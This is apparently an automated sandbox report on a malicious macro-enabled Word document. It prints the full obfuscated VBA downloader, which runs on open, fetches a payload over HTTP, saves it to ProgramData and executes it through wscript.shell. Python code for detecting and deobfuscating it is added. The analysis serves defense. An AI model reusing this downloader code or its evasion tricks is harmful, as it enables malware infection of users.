Verdict: MALICIOUS
Risk score: 290
Heuristics: 7

- ClamAV: Doc.Macro.ICEID1020-9781212-0 [critical] CLAMAV_DETECTION: ClamAV detected this file as malware: Doc.Macro.ICEID1020-9781212-0
- VBA project inside OOXML [medium, 4 related findings] OOXML_VBA: Document contains a VBA project (VBA macros present)
- Potential Shell call in VBA [critical] OLE_VBA_SHELL: Potential Shell call in VBA. Matched line in script:
    Set aEnkX = CreateObject(WpKaj + "." + "shell")
- CreateObject call [high] OLE_VBA_CREATEOBJ: CreateObject call. Matched line in script:
    Set BNexw = VBA.CreateObject(ncbar + "" + xDJFk)
- VBA p-code auto-exec with execution tokens [high] OLE_VBA_PCODE_AUTOEXEC_EXEC: Triggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it; it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
- AutoOpen macro [low] OLE_VBA_AUTOOPEN: AutoOpen macro. Matched line in script:
    Sub AutoOpen()
- Embedded URL [info] EMBEDDED_URL: One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. All 28 URLs below were found in document text (OOXML body / shared strings). Every one of them is an XML namespace URI declared by the OOXML package parts (schemas.microsoft.com/office/... and schemas.openxmlformats.org/...), which any Word-generated .docx carries, so none of them is a network indicator. The URL the macro actually contacts is not present as plain text anywhere in the package: it is read at run time from the first shape's alternative text and unreversed before use (see the extracted script).
    http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas
    http://schemas.microsoft.com/office/drawing/2014/chartex
    http://schemas.microsoft.com/office/drawing/2015/9/8/chartex
    http://schemas.microsoft.com/office/drawing/2015/10/21/chartex
    http://schemas.microsoft.com/office/drawing/2016/5/9/chartex
    http://schemas.microsoft.com/office/drawing/2016/5/10/chartex
    http://schemas.microsoft.com/office/drawing/2016/5/11/chartex
    http://schemas.microsoft.com/office/drawing/2016/5/12/chartex
    http://schemas.microsoft.com/office/drawing/2016/5/13/chartex
    http://schemas.microsoft.com/office/drawing/2016/5/14/chartex
    http://schemas.openxmlformats.org/markup-compatibility/2006
    http://schemas.microsoft.com/office/drawing/2016/ink
    http://schemas.microsoft.com/office/drawing/2017/model3d
    http://schemas.openxmlformats.org/officeDocument/2006/relationships
    http://schemas.openxmlformats.org/officeDocument/2006/math
    http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing
    http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing
    http://schemas.openxmlformats.org/wordprocessingml/2006/main
    http://schemas.microsoft.com/office/word/2010/wordml
    http://schemas.microsoft.com/office/word/2012/wordml
    http://schemas.microsoft.com/office/word/2018/wordml/cex
    http://schemas.microsoft.com/office/word/2016/wordml/cid
    http://schemas.microsoft.com/office/word/2018/wordml
    http://schemas.microsoft.com/office/word/2015/wordml/symex
    http://schemas.microsoft.com/office/word/2010/wordprocessingGroup
    http://schemas.microsoft.com/office/word/2010/wordprocessingInk
    http://schemas.microsoft.com/office/word/2006/wordml
    http://schemas.microsoft.com/office/word/2010/wordprocessingShape
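The OLE_VBA_PCODE_AUTOEXEC_EXEC finding above is a co-occurrence rule rather than a signature. The block below is an added illustration of that rule, written for this page and not the analyzer's own code: it scans whatever text survives from a VBA stream (decompressed source, or the identifier/string table of a p-code-only module) for the two token classes the finding lists, and fires only when both are present. The sample inputs are constructed: one is the report's own extracted macro with the junk comment lines and unrelated routines removed, the other imitates an identifier table of a module whose source could not be recovered.

```python
"""Token-pair check behind OLE_VBA_PCODE_AUTOEXEC_EXEC (added illustration,
not the analyzer's code).  Runs over whatever text survives from a VBA
stream: decompressed source, or the identifier/string table of a
p-code-only module whose source could not be extracted."""
import re

# Token classes exactly as the finding lists them.
AUTOEXEC_TOKENS = ("Auto_Open", "AutoOpen", "Document_Open", "Workbook_Open",
                   "Auto_Close", "AutoClose")
EXEC_TOKENS = ("Shell", "CreateObject", "GetObject", "PowerShell", "cmd.exe",
               "URLDownloadToFile", "WinHttp", "XMLHTTP", "ADODB.Stream",
               "ShellExecute", "ExecuteExcel4Macro")


def find_tokens(stream_text, tokens):
    """Tokens present as whole words, case-insensitively (VBA is
    case-insensitive).  Lookarounds instead of \\b so that 'cmd.exe' and
    'ADODB.Stream' work and 'Shell' does not match inside 'ShellExecute'."""
    hits = []
    for tok in tokens:
        pattern = r"(?<![A-Za-z0-9_])" + re.escape(tok) + r"(?![A-Za-z0-9_])"
        if re.search(pattern, stream_text, re.IGNORECASE):
            hits.append(tok)
    return hits


def pcode_autoexec_exec(stream_text):
    """Fires only when an auto-exec entry point AND an execution token occur
    in the same stream; either class alone is not enough."""
    auto = find_tokens(stream_text, AUTOEXEC_TOKENS)
    execs = find_tokens(stream_text, EXEC_TOKENS)
    return {"fires": bool(auto) and bool(execs), "autoexec": auto, "exec": execs}


# Constructed input: the report's extracted macro with the junk comment
# lines and unrelated routines removed.
SAMPLE_SOURCE = r'''
Sub AutoOpen()
    Dim vNtjh As New UccEI
    ZCiNB = vNtjh.fbsyo(twvfS)
    qsiXo AVqDG(ZCiNB)
    Svbci jZuLf(0) + "vr32 c:\programdata\tELNv.txt", "wscript"
End Sub
Public Const twvfS As String = "ptthniw"
Sub Svbci(TuMjt, WpKaj)
    Set aEnkX = CreateObject(WpKaj + "." + "shell")
    Call aEnkX.exec(TuMjt)
End Sub
Function fbsyo(cqtRY)
    Set QxAaP = CreateObject(SpZUr(cqtRY, 1) + "." + SpZUr(cqtRY, 1) + "Request.5.1")
End Function
'''

# Constructed input: what the identifier table of a p-code-only module might
# yield when the source itself is unavailable.
SAMPLE_PCODE_STRINGS = "ThisDocument AutoOpen qsiXo CreateObject CreateTextFile WriteLine Close"

if __name__ == "__main__":
    for name, text in (("source", SAMPLE_SOURCE), ("p-code strings", SAMPLE_PCODE_STRINGS)):
        print(name, pcode_autoexec_exec(text))
```

Two things the run makes visible. First, WinHttp is never found at source level because the macro stores it reversed ("ptthniw"); the rule still fires on AutoOpen paired with CreateObject and Shell, which is why a co-occurrence rule survives string obfuscation that a single-token signature would not. Second, the "Shell" hit comes from the quoted literal "shell" inside CreateObject(WpKaj + "." + "shell"), the same line the OLE_VBA_SHELL finding matched.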
Extracted artifacts: 2
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 13464 bytes | f42a562fb2024bd712683c2e0e9a3e535352c275380426db6e29ed2cc43f879f |
Preview script (first 1,000 lines of the extracted macros.bas):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "NfpGe"
Sub qsiXo(ZCiNB, Optional ByVal KmGhd As String = "c:\programdata\tELNv.txt", Optional ByVal xDJFk As String = "systemobject")
' Acquitting
' Evened canticles burn
' Skirl bureaucratically tested pacifists idiom
' Overtures disappears mortality
' Shoestring thrusts uncoil cuisine
' Photochemistry headbands maniacal
' Crazily tummies flypaper corpuscle
' Aggressively gaiters longawaited wriggled sumatra
' Profligate reciprocals twilight indoctrinator patrolled applicator gourmets
' Vatican politicians bright anagram
' Inanely emulate pupating expedients abrasives
' Lagged buttress scat
' Budded shrewder recoils
' Macaw postpones shoves ampuls coplanar
' Contradictorily purgative
' Semantically musk
' Assenting screwdriver workbooks
' Monolingual topping irony connoisseurship
' Accelerator
Set BNexw = VBA.CreateObject(ncbar + "" + xDJFk)
' Procures eyes
' Flayers guacamole worrier asides
' Articled transgressor waverers bleating wretches
' Copyrighted medlar paediatric trueblue emotions
' Redirect photostat regulations polymer
' Solidifying squeals
Set ijDGE = BNexw.CreateTextFile(KmGhd)
' Supernumerary earthiness drunks trimmed
' Fastest pariah nay
' Coffers beirut learnable
' Ultimate tramcars depressingly
' Snappily
' Uterus plucker furtiveness misleads duskier
ijDGE.WriteLine ZCiNB
' Disinfecting mat zippy
' Debutantes
' Shamanic albinism
' Coupes
' Reticulum wagon proposing
ijDGE.Close
' Sharpening expanse percussionists
' Prosecutions bole
' Praises parental complot
' Littleness memphis masted
' Probate materialistically sneak
' Hems decreasingly
' Helpers thorium gunship soiling critically racialists
' Banter lyricism rebounding
' Gobbles novices calcareous evaders evolutionists
' Fearless disillusioning satyr supervising heroic
' Heresies gynaecologists gnashed conceptualisation pachyderm
' Tumour peptide
' Predisposing eventide
' Delegation looking bless
' Glisten undisplayed unsympathetically
' Syndicated
' Chastening crusted electrician
' Inarticulate frameup perpetrate rests menthol
' Douching brain immaterial
' Libertarians monostable
' Dante arachnid
' Droller stewed umbrage sweetheart expunge
' Hummocky fortnight
' Synchronicity boniest snipped
' Whole cation sweetness
' Emulation expropriate cannes
' Polyethylene
' Incapacitates stoical debunk envelopers precis thriving
' Contractors codename gramophones multiplies meet
' Crystallography unstack impairs stockbroker fenced pest
' Pancake delate towel
' Cocain torchbearer deadly carsick
' Dialler serial
' Statistical silting unwrapping transformed regurgitate
' Interrogations
' Holed vainest dustbins soundless
' Tinder size observed assyrian
' Occurs facades
' Impotence fascias diagonals
' Bestsellers exterminator
' Raining remitting spotty
End Sub
' Boggled gangways charades undressing
' Courtiers transpires unmasked
' Vertices reticule investment clandestinely
' Multilevel rationalise personality epidemics sucked
' Mineshaft bridegrooms gobbledegook cassocks
' Surpass tipsters snooker heists
Sub AutoOpen()
' Enlivens voyaged ecumenically gazing
' Referees
' Uninsulated skim dams readymade unpalatable prolactin unappealing
' Sones
' Dozing
' Arranger materialise
' Acknowledging shave mistimed
' Visualisation expend
' Verona
' Drape steels adventured mafia
' Mandated circa observationally
' Unexpanded snowmen forethought
' Lamentation bumpy gannets baboons conceal
' Jackasses mineral wilting launched
' Needlecraft mutant
' Shackled detoured wellbeing
' Florins peach
' Metamorphism leaps affiliated endangering
' Legibly
' Streaming childhoods aimless warbling
' Keeping ingeniously stripy cannibal
' Inbound catheters shiniest
' Stayed diva questing heatresistant
' Directories statement demagog scooping perspectives
' Jussive wicketkeepers piles appointed
' Puzzled correlations remorsefully
' Behest dumbfound abominations motioned westernised
' Bedfellow waning sediments crashes unpredicted pacifist
' Pancreatic crime representable
Dim vNtjh As New UccEI
' Deliveries pungency serve
' Magnanimous
' Forge scourge
' Unmasks penury
' Driers dizziest extinctions comparable
cLQjU = ""
' Immunologist ectopic
' Agitations auk undomesticated maximality meromorphic weds
' Wrangle pacify
' Steadiest torchbearers art tumults tantalum
' Permissible
' Demarcated revolvers overthrows fullscale protocol backwards
' Lifeguards toffy convulsive recopy sullied
' Somersault celebrant crocks
' Saint
' Polymer trice unfettered
' Classifications coating panties subspecies
' Fleshless
' Cauliflowers
ZCiNB = vNtjh.fbsyo(twvfS)
' Lanyard domiciled branched
' Consortia
' Crisscrossed shuttered deliberated demagogic namesakes tourist
' Pajamas cords
qsiXo AVqDG(ZCiNB)
' Inflexion liberty herring dank define
' Piccolo mathematician doorbell anaerobically masterful
' Hummable heifers
' Nightmare
' Recommencement
' Soot cleverness
' Coulombs chromium convex looking
' Conservationists police
' Spook cloves
' Streakers differing unsharable maturation necks
' Intensify
' Hurriedly paring
Svbci jZuLf(0) + "vr32 c:\programdata\tELNv.txt", "wscript"
End Sub
Function gzVHC(uxXqh, LbwhE)
' Outpouring lousy blacked erectly freights
' Intellectually landlady cometary
' Tobogganing acoustics blowup
' Feudalism faceting pinafore
' Gatherers
gzVHC = Split(uxXqh, LbwhE)
End Function
Attribute VB_Name = "qXBIi"
' Bailed palaver apologises lecher
' Eeriness oxtails topples equable bordering
' Notational lightheartedly resold unexploded hampers
' Backbenchers
' Slamming embolden importunity cripple
Function AVqDG(GHCOe)
' Crewman outstripped
' Pertinacity considerately pluses outlives
' Unfashionable trustworthy closers
' Estimated
AVqDG = StrConv(GHCOe, vbUnicode)
' Digital complacent
' Acrid usurp
' Crossbars spiritually higher react
' Enmity swarmed
' Soon fullpage meriting tolling
End Function
' Sublimed shatterproof
' Haystacks associations chisels
' Rioters outlooks stacked revels
' Frowned bedazzle recoiling
' Ambushes kindnesses
Function HjpoR()
' Affliction figural subsumes
' Canister maintenance
' Arks protocols curved outlasts
' Ablates calmed jaundice usages
' Intoning gingivitis
' Technologies textured untestable bursary
' Encryption
' Mega spurious provident foraged bra
' Tapers retinues associations splicer bullock grinded
' Spittoon routes consumes rugs
With ActiveDocument.shapes(1)
HjpoR = .AlternativeText
End With
End Function
' Vinegar hardheartedness monomeric
' Choral internuclear
' Unsurpassed
' Partridges derive maintain evolutionary atonement
' Ravine trainee freesia selfportrait
' Collage mousse
Function jZuLf(QNPRW)
' Enciphering rancorous
' Prosperous
' Someday
' Upright costless demonstrators unbuckling
' Inquisitions propitiatory
' Liens compartmentalisation quarantine
' Refrain apostles
' Dogged funniest ridged check fortnightly
' Brainwashed inconveniences inadvertence blunts
' Inefficiently orate
' Mechanically serialisation
' Spare translators recaps diaper trumpeted
yCYLt = gzVHC(HjpoR(), "~~~")
oNkQy = yCYLt(QNPRW)
jZuLf = oNkQy
End Function
Attribute VB_Name = "UccEI"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Function crAbc(GYHuC, TuInZ, dPVli)
' Eukaryotes quickly prerogatives misted
' Plaque
' Postured flannel
' Fathomless technophobia scholasticism truncate
crAbc = Mid(GYHuC, TuInZ, dPVli)
End Function
Public Function SpZUr(VRGgv, TpLKG)
' Tonics verbosity skip
' Colonise dinner lunched allowances
' Bravo instrumentality inlays
' Divot
' Tractability winnowing produce
' Convenience whirling definer anymore
' Silently benefits homogenisation
' Quiveringly sneakers smogs certified
' Informatory intensive enhancers automates alms
' Lunar stamps gavotte wetter reminding
' Uniting vindicate
' Dovecot creditors
' Unregistered zaire dizzying arrogant intoxicant
' Pretences rotas furnace freelance
' Abyssal exoskeleton ectoplasm
gBDQN = Trim(VRGgv)
For VMEDH = TpLKG To Len(gBDQN)
GhgQh = crAbc(gBDQN, VMEDH, TpLKG) & GhgQh
Next VMEDH
SpZUr = GhgQh
End Function
' Tares indexation cutlasses
' Hotels icecap white
' Cortisone interwoven
' Galloping croquette
Function fbsyo(cqtRY)
' Contradiction
' Allots stated
' Redemption riflemen
' Longer axiomatising
' Neuroscience unattractiveness spectrophotometry prejudge
' Gratis visited
' Remainder unwind disturb
Dim QxAaP As Object
' Gazetteer wooer longsuffering
' Tasted jewel uncheckable tautologous
' Impersonated debauch
' Hardening rendezvoused resolve autobahn
' Helpful disenfranchises suppliants mowing
' Whiskey woodcutter
' Severity hectic glazer hipsters schist fireball nether
' Hangovers fiddlers heavenward chevrons protruding outlay
' Peep subconscious intercountry crocodile lobbing schemata
' Furrow disconnection malformations blows convulsing uncle
' Planing biographical prophecy oath
Set QxAaP = CreateObject(SpZUr(cqtRY, 1) + "." + SpZUr(cqtRY, 1) + "Request.5.1")
' Reanimated
' Assembling actions
' Crusading sauciness wormholes outflows
' Greyhound
' Proper vigour diggings
' Blots momentous gourd statue tallies referenda phosphorus mellowing
' Cybernetic possibly
' Doubtlessly oat epiphenomenon confoundedly homoeopathic parametrisation
' Mistiness sulky pillars slashes
' Fleet delineates reproductive shaded disapprobation
' Formulate
' Demoralising unawareness epitomises scuttles
' Trolley cadenzas espadrilles optimisations
' Exulting hexagons excitations genoa megajoules succinct
' Sparked subcutaneously
' Sprig redefiner unreferencing
' Mangroves modifiable folding luna
' Muzzled rallying panders captive
' Concoctions regionally
' Aeon loquacious waxwork constituent renunciations
' Adjectives stuns apostrophe
ovemA = jZuLf(1)
' Forwardlooking redeployment bargainers
' Inked chiller dishes
' Naturalness electrify
' Sessile coercer quartiles anonymously
' Foehns
' Avoidable indissoluble excess extraterrestrial unresolvable mutterings splintered
QxAaP.Open "GET", SpZUr(ovemA, 1), False
' Overseeing cramps
' Armistice reinitialising elementary colitis toasty unscrewing
' Freaks copiers robbing aftereffects
' Taxidermist revenges ionise
' Heavens doughty cores
' Wearer predominance wrathfully triumphing
' Chaffinch cretaceous orates
' Warning slanderer lenin
QxAaP.Send
' Peculiarly gutless warhorse yokels intercountry cold
' Stylistically
' Arbitrarily debentures
' Gash
' Sidelines phototypesetting closeknit pantheistic interferences assailed
fbsyo = QxAaP.responsebody
End Function
Attribute VB_Name = "kbzai"
Public Const twvfS As String = "ptthniw"
Public Const ncbar As String = "scripting.file"
Sub Svbci(TuMjt, WpKaj)
' Hollowness
' Eligibly dims inactivation
' Armouries defrosted
' Usurped decipherment
' Terrapins shipshape callup philosophic aerobraking
Set aEnkX = CreateObject(WpKaj + "." + "shell")
' Powerboats golly caps sporty stinky
' Gnat boggles
' Immigration marmot cohesion
' Austria moonshot
' Counterbalanced amalgamation
' Acknowledge jazzier heavyweights dangerously exert
' Reprojected splintering
' Adored hinder stillborn removing lawnmowers ascents
' Trainee thinned proponents
' Polyester aerating
' Trappers womanhood discountability
' Perfectionists teaches bay zealous gargantuan
' Double passageway
' Corporatism correlated stupidity carrot cornering
' Comparator branched endometrium
' Rigging rapacious
' Pears bounce corpse ensures gangs
' Afforested leucine abolishes windowed
' Microlight
' Sopping shifts
' Hospitalisation loudhailer copywriter masochism sawmills
' Obtuseness cow preoccupy revivals quizzed fatal teargas
' Savagery iotas invents less gazing
' Eyelashes burdened internalise proposes
' Tadpoles modifying typicality
' Plunging pyrites chattily deserter personalising
' Sublime
' Elderly dates formatted crewing trolley
' Upkeep petal hooking valise parodying econometrics
' Gelding spillage snappier server predictions
' Mouthwatering technophobic horseplay combusted hysterically
' Dullard warehousing rightfully libeller
' Never pumpkin sulked hardback
' Concentrated distinguishably slushier
' Misfortune dismemberment encode
' Obsolescent fustian expanses
' Workaday
' Mindlessly cultivating quartile
' Transposed elopement degenerate
' Abortion outspan growler
' Novelistic tresses encirclements unwaveringly mitten interruptibility
' Gurgled
' Popping begets visors schist suburbia angel
' Feeblest teen lilliput
Call aEnkX.exec(TuMjt)
' Khan schwas iran chuck
' Catalyst clink polygynous remould
' Perfectionism hypnotised impresses importing exclusively
' Constructively works shun
' Imbecile mowing normalise
' Fretwork dumbness corporeally chanced likeminded
End Sub

| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| vbaProject_00.bin | vba-project | OOXML VBA project: word/vbaProject.bin | 48128 bytes | 75cca93bf434bf6a99f35a28e0cf8e2cd0b244861e0502d06ffd84e0c8f6d458 |
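The extracted macro hides its real strings behind three small tricks: a reversal routine (SpZUr, which prepends one character at a time), constants split across modules (twvfS, ncbar, the "shell" and "systemobject" literals), and two run-time values pulled from the first shape's alternative text (HjpoR, split on "~~~" by gzVHC/jZuLf). The block below is an added example written for this page, not part of the report or the sample: it ports those routines to Python and re-traces AutoOpen with every trick undone. The constants are copied from the macro; the shape alternative text is not in the report, so the one used here is constructed, with a placeholder command prefix and a non-routable URL.

```python
"""Deobfuscation of the extracted macro's string handling (added example,
not part of the report).  Constants are copied from the macro; the shape
alternative text the macro reads at run time is not in the report, so a
constructed one with a placeholder prefix and non-routable URL is used."""


def mid(s, start, length):
    """VBA Mid(): 1-based start, `length` characters (crAbc in the macro)."""
    return s[start - 1:start - 1 + length]


def spzur(text, n=1):
    """Port of SpZUr(VRGgv, TpLKG): from position n to the end, take n chars
    and PREPEND them.  With n = 1 (the only value the macro uses) this is a
    plain string reversal.  VBA Trim strips spaces only, hence strip(' ')."""
    text = text.strip(" ")
    out = ""
    for i in range(n, len(text) + 1):
        out = mid(text, i, n) + out      # crAbc(gBDQN, VMEDH, TpLKG) & GhgQh
    return out


def jzulf(alt_text, index):
    """Port of jZuLf: HjpoR() returns shapes(1).AlternativeText, gzVHC splits
    it on '~~~', and the caller picks one element."""
    return alt_text.split("~~~")[index]


def recover_chain(alt_text):
    """Re-trace AutoOpen with the string tricks undone."""
    twvfS = "ptthniw"                          # Public Const in module kbzai
    ncbar = "scripting.file"                   # Public Const in module kbzai
    drop_path = r"c:\programdata\tELNv.txt"    # qsiXo's default KmGhd argument
    return {
        # fbsyo: CreateObject(SpZUr(cqtRY, 1) + "." + SpZUr(cqtRY, 1) + "Request.5.1")
        "http_progid": spzur(twvfS) + "." + spzur(twvfS) + "Request.5.1",
        # fbsyo: QxAaP.Open "GET", SpZUr(jZuLf(1), 1), False  (URL is stored reversed)
        "url": spzur(jzulf(alt_text, 1)),
        # qsiXo: VBA.CreateObject(ncbar + "" + "systemobject"), then CreateTextFile/WriteLine
        "fso_progid": ncbar + "" + "systemobject",
        "drop_path": drop_path,
        # Svbci(cmd, "wscript"): CreateObject("wscript" + "." + "shell").exec(cmd)
        "shell_progid": "wscript" + "." + "shell",
        # AutoOpen: Svbci jZuLf(0) + "vr32 c:\programdata\tELNv.txt", "wscript"
        "command": jzulf(alt_text, 0) + "vr32 " + drop_path,
    }


# Constructed alternative text (assumption, not from the report): element 0 is
# the command prefix the real document carries, unknown here and replaced by a
# placeholder; element 1 is the download URL stored reversed.
SAMPLE_ALT_TEXT = "<prefix>~~~" + "http://example.invalid/stage2"[::-1]

if __name__ == "__main__":
    for key, value in recover_chain(SAMPLE_ALT_TEXT).items():
        print(f"{key:12} {value}")
```

CreateObject resolves ProgIDs case-insensitively, so the recovered "winhttp.winhttpRequest.5.1" is WinHttp.WinHttpRequest.5.1; the response body is passed through StrConv(..., vbUnicode) and written with WriteLine to c:\programdata\tELNv.txt, and that path is then handed to a command whose tail is "vr32", with the prefix supplied by the document (a shape alt text, which the report does not show; a reader will recognise the tail as consistent with regsvr32, but that is an inference). For triage, the two run-time values to pull from the sample are therefore the first shape's alternative text in word/document.xml, and from it the unreversed URL and the full command line.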
Detection
ClamAV: Doc.Macro.ICEID1020-9781212-0
Obfuscation or payload: unlikely (automated verdict). Read this field with care: the extracted source above shows at least two obfuscation techniques, string constants stored reversed (the constant "ptthniw" unreverses to "winhttp", giving the WinHttp.WinHttpRequest.5.1 ProgID) and every routine padded with dictionary-word comment lines, and the run-time strings (command prefix and download URL) live in a shape's alternative text rather than in the macro. No second-stage payload is embedded in the file; it is fetched over HTTP at run time and written to c:\programdata\tELNv.txt before being executed.